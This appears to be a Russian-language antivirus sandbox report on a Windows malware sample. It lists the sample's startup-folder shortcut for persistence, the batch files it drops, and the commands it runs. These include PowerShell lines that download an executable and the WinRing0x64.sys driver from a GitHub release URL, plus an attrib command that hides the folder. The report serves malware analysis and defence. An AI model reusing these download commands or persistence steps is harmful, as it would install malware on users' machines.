Техническая информация
Для обеспечения автозапуска и распространения
Создает или изменяет следующие файлы
- %APPDATA%\microsoft\windows\start menu\programs\startup\update.lnk
Изменения в файловой системе
Создает следующие файлы
- %TEMP%\cb.tmp\dotnet.bat
- %HOMEPATH%\desktop\update.lnk
- %HOMEPATH%\games\update.bat
Другое
Запускает на исполнение
- '<SYSTEM32>\cmd.exe' /c ""%TEMP%\CB.tmp\dotnet.bat" "<Полный путь к файлу>"" (со скрытым окном)
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest -Uri 'https://github.com/TReemaysteruim/Remonte/releases/download/v1.1.0/Excle.exe' -OutFile '%HOMEPATH%\Games\Excle.exe'"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "Invoke-WebRequest -Uri 'https://github.com/TReemaysteruim/Remonte/releases/download/v1.1.0/WinRing0x64.sys' -OutFile '%HOMEPATH%\Games\WinRing0x64.sys'"
- '<SYSTEM32>\attrib.exe' +h "%HOMEPATH%\Games"
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -Command "$WshShell = New-Object -ComObject WScript.Shell; $Shortcut = $WshShell.CreateShortcut('%HOMEPATH%\Desktop\Update.lnk'); $Shortcut.TargetPath = '<Полный путь к файлу>'; $Shortcut.Save(...
